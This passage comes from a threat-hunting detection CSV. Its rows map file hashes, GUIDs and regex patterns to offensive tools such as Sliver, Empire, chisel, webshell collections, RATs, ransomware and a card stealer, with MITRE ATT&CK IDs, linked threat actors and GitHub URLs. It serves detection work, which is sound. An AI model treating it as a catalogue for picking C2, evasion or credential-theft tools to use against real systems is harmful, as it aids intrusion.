"*c4e091bf77e1eda6f74951893238a2d68b61d530ad71ae993f21576ef80b6903*",".{0,1000}c4e091bf77e1eda6f74951893238a2d68b61d530ad71ae993f21576ef80b6903.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","37018" "*c4e2c901b28da1a3c2d5b4714a9f11c9e4b9f417c1be73290a14a6d622607f78*",".{0,1000}c4e2c901b28da1a3c2d5b4714a9f11c9e4b9f417c1be73290a14a6d622607f78.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37019" "*c4e3e811811d927b64d5f66596be79f4110c7bcaa77621fbb73b7c7d8f69189c*",".{0,1000}c4e3e811811d927b64d5f66596be79f4110c7bcaa77621fbb73b7c7d8f69189c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","37020" "*c4e9806596b8e6123a595395b0efe604176dfd2e767418fe4adf69c70de557b5*",".{0,1000}c4e9806596b8e6123a595395b0efe604176dfd2e767418fe4adf69c70de557b5.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","#filehash","N/A","9","3","273","40","2024-06-16T19:47:36Z","2024-01-10T17:25:58Z","37021" 
"*c4eac73762f7e920030de4e0de677fd6c87372ec59fffcb636996d6ad86358d9*",".{0,1000}c4eac73762f7e920030de4e0de677fd6c87372ec59fffcb636996d6ad86358d9.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","37023" "*c4ef00f9cf5b19babc7d9d7de5d4724c3b077be8dcd449b17dde8fe5297f5a98*",".{0,1000}c4ef00f9cf5b19babc7d9d7de5d4724c3b077be8dcd449b17dde8fe5297f5a98.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","37025" "*c4f026c01e451e1afa61ab8233fd15a3c0b4da615eae5d893db82b84bbe49e40*",".{0,1000}c4f026c01e451e1afa61ab8233fd15a3c0b4da615eae5d893db82b84bbe49e40.{0,1000}","offensive_tool_keyword","RevengeRAT-Stub-Cssharp","RevengeRAT - AsyncRAT Simple RAT","T1219 - T1055 - T1569.002 - T1035 - T1071 - T1105","TA0005 - TA0042 - TA0011","N/A","TA2541 - APT-C-36","C2","https://github.com/NYAN-x-CAT/RevengeRAT-Stub-Cssharp","1","0","#filehash","N/A","10","10","92","39","2020-03-02T11:34:36Z","2019-09-15T09:39:07Z","37026" "*c4f85b6571f2fe493811418ea62fa29c393799ea3e3cd2ba907b70229a57935d*",".{0,1000}c4f85b6571f2fe493811418ea62fa29c393799ea3e3cd2ba907b70229a57935d.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim 
Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","37027" "*c4fa40d25a8a4fc502e9cce4fa6d7ef7847141bda5f2fb7b90bd9f4b43ee5d13*",".{0,1000}c4fa40d25a8a4fc502e9cce4fa6d7ef7847141bda5f2fb7b90bd9f4b43ee5d13.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#filehash","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","37028" "*c4fa40d25a8a4fc502e9cce4fa6d7ef7847141bda5f2fb7b90bd9f4b43ee5d13*",".{0,1000}c4fa40d25a8a4fc502e9cce4fa6d7ef7847141bda5f2fb7b90bd9f4b43ee5d13.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#filehash","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","37029" "*C4RD N4M3: *| NUMB3R:*",".{0,1000}C4RD\sN4M3\:\s.{0,1000}\|\sNUMB3R\:.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","37031" "*c50948b611e3e9902eab10fff0c03918d3420fb4126a9ca8a8882f03613775e5*",".{0,1000}c50948b611e3e9902eab10fff0c03918d3420fb4126a9ca8a8882f03613775e5.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","37033" "*c51005736c67304bf96c0e5421ce44f700578b87dbc912a820fd38dfa146fe41*",".{0,1000}c51005736c67304bf96c0e5421ce44f700578b87dbc912a820fd38dfa146fe41.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","#filehash","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","37036" "*c51687517b8113afd3b26a2db8329d76ba8232069480c6fd49e255dd4ebe30c6*",".{0,1000}c51687517b8113afd3b26a2db8329d76ba8232069480c6fd49e255dd4ebe30c6.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37037" "*c518104a683209a63029169a1a69e839cf0a7baf26f29bf1fcc96e6c4f776245*",".{0,1000}c518104a683209a63029169a1a69e839cf0a7baf26f29bf1fcc96e6c4f776245.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#filehash","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","37038" "*c5249fdd933f64a03adee3f4ddd76878ee33c70e08f34299cc979bd7f67e70a1*",".{0,1000}c5249fdd933f64a03adee3f4ddd76878ee33c70e08f34299cc979bd7f67e70a1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - 
TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37041" "*c526a60222848f43e3d11b9fceae6cab1e9e414b490f8247ee95bff8a864b61f*",".{0,1000}c526a60222848f43e3d11b9fceae6cab1e9e414b490f8247ee95bff8a864b61f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37043" "*C526B877-6AFF-413C-BC03-1837FB63BC22*",".{0,1000}C526B877\-6AFF\-413C\-BC03\-1837FB63BC22.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","#GUIDproject","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","37044" "*c52ebc7882d730dcd1d32551e8ed3eca5997f56079efb92c591e62292d3c0c09*",".{0,1000}c52ebc7882d730dcd1d32551e8ed3eca5997f56079efb92c591e62292d3c0c09.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37047" "*c5322b9356674659db7025d0571de7020532e4ddc25ecfe69a7fddae00e95476*",".{0,1000}c5322b9356674659db7025d0571de7020532e4ddc25ecfe69a7fddae00e95476.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - 
TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37048" "*c53a7f81553bb2d0b575c48c194a100c9d10dd08f6c7538c92a9db2080b47792*",".{0,1000}c53a7f81553bb2d0b575c48c194a100c9d10dd08f6c7538c92a9db2080b47792.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37050" "*c53bc13170b9ff26b0cca93715e947318e06cafe0d98cf825eabffe3c7f763cb*",".{0,1000}c53bc13170b9ff26b0cca93715e947318e06cafe0d98cf825eabffe3c7f763cb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37052" "*c545fe6ed777aebd67e71c4f31eeaf05ca2a384d9837d752f238b484fd4514a9*",".{0,1000}c545fe6ed777aebd67e71c4f31eeaf05ca2a384d9837d752f238b484fd4514a9.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37053" 
"*c546b48376d7d1ba5819e19231547d682cf9d137001de827b209a3c06cd184c0*",".{0,1000}c546b48376d7d1ba5819e19231547d682cf9d137001de827b209a3c06cd184c0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37054" "*c5486044f99bdf53ddbd6d45a22c38183f094a8c0db958c189c2b601d2b2b13e*",".{0,1000}c5486044f99bdf53ddbd6d45a22c38183f094a8c0db958c189c2b601d2b2b13e.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","37056" "*c5512b0f7e41dfd3f8a5c0dff6910509a6cb3e4653a87b3d4daa402d7b40bb98*",".{0,1000}c5512b0f7e41dfd3f8a5c0dff6910509a6cb3e4653a87b3d4daa402d7b40bb98.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37057" "*c55abfcbc2387e66916f27209a8c7ec2066eb3f5787ef72a7aa8945646cc3eba*",".{0,1000}c55abfcbc2387e66916f27209a8c7ec2066eb3f5787ef72a7aa8945646cc3eba.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","37058" "*c562f6223396e63dae95ab394c4b7a4ff3836d246a97266d5bb601f47bfdd2a1*",".{0,1000}c562f6223396e63dae95ab394c4b7a4ff3836d246a97266d5bb601f47bfdd2a1.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","37059" "*c56e66d683919054d0ae34f15f5d08624ad6a8c211ba8768fb52d09190b0a74d*",".{0,1000}c56e66d683919054d0ae34f15f5d08624ad6a8c211ba8768fb52d09190b0a74d.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","37061" "*c571768a81029101024089c004311655cdfba690a01954835808439b691a47c0*",".{0,1000}c571768a81029101024089c004311655cdfba690a01954835808439b691a47c0.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","37062" 
"*c5733dd416b4bfaed6f24b3a8755fd49f441c5675749a087e018ec7de628be90*",".{0,1000}c5733dd416b4bfaed6f24b3a8755fd49f441c5675749a087e018ec7de628be90.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","37064" "*c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30*",".{0,1000}c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37067" "*c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30*",".{0,1000}c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37068" 
"*c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30*",".{0,1000}c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37069" "*c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30*",".{0,1000}c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37070" "*c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30*",".{0,1000}c583cc6e021fb8b1d77bf028ea18748302ea8d7a142f875d87414358c7a94f30.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37071" "*c58ae1aeef1d895bfc5083722ab5e5b9e097abf48426d8c1210017f94a6aa8e1*",".{0,1000}c58ae1aeef1d895bfc5083722ab5e5b9e097abf48426d8c1210017f94a6aa8e1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37074" 
"*c58ca5354bbf124feccf0f2347ad5d9a4f2d6a6593b1e4ce71c380e12e9bf1de*",".{0,1000}c58ca5354bbf124feccf0f2347ad5d9a4f2d6a6593b1e4ce71c380e12e9bf1de.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","37075" "*c591ed58f48171fa285464339a17acd1c267c0299df9f0b4e53eed9a8acb8f9f*",".{0,1000}c591ed58f48171fa285464339a17acd1c267c0299df9f0b4e53eed9a8acb8f9f.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","#filehash","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","37077" "*c59442ebadea15353f763e5e4ad6267d1c9acd9f40e3af728185b524478e4d66*",".{0,1000}c59442ebadea15353f763e5e4ad6267d1c9acd9f40e3af728185b524478e4d66.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","37078" "*c59750dfe30a62ae41e8ba1fe138ce5bc575041afa2d7b87645e2f5d54526a9d*",".{0,1000}c59750dfe30a62ae41e8ba1fe138ce5bc575041afa2d7b87645e2f5d54526a9d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - 
KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37079" "*c59bb1299b1edf20518ae2b0775eb56eae62a77e46dc3ae45560f47e0af39299*",".{0,1000}c59bb1299b1edf20518ae2b0775eb56eae62a77e46dc3ae45560f47e0af39299.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37080" "*c59d5571282b31757c89952001ed062772d696e1df2f036b1d4328f9eb99806a*",".{0,1000}c59d5571282b31757c89952001ed062772d696e1df2f036b1d4328f9eb99806a.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","37081" "*c5a1680cc5dd2fe6fe2fd465429489a6c67ee5f4e7463344fe0dc92f8d672a9b*",".{0,1000}c5a1680cc5dd2fe6fe2fd465429489a6c67ee5f4e7463344fe0dc92f8d672a9b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37083" "*c5a8a142728c93974f8bad555cf988db83be078e17dc1ac591fa3ff1303e852a*",".{0,1000}c5a8a142728c93974f8bad555cf988db83be078e17dc1ac591fa3ff1303e852a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 
- TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37084" "*c5a8b48bbe0bf68409a54d401ebac706e3f3880822310717d2d8e7db5cec436b*",".{0,1000}c5a8b48bbe0bf68409a54d401ebac706e3f3880822310717d2d8e7db5cec436b.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","37085" "*c5af796b44a3d3d09e184ef622ad002b8298696c2de139392fd35898f5073527*",".{0,1000}c5af796b44a3d3d09e184ef622ad002b8298696c2de139392fd35898f5073527.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","#filehash","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","37086" "*c5b452ef4e7c5a5cd045419c94244148563d168a7d682baa622d113466e4a3ae*",".{0,1000}c5b452ef4e7c5a5cd045419c94244148563d168a7d682baa622d113466e4a3ae.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","37088" "*c5b69369f46c94d6c1ac5c2f3808be48fa6d790c7d7d909d82850cc8774a14ac*",".{0,1000}c5b69369f46c94d6c1ac5c2f3808be48fa6d790c7d7d909d82850cc8774a14ac.{0,1000}","offensive_tool_keyword","empire","Empire is a 
post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 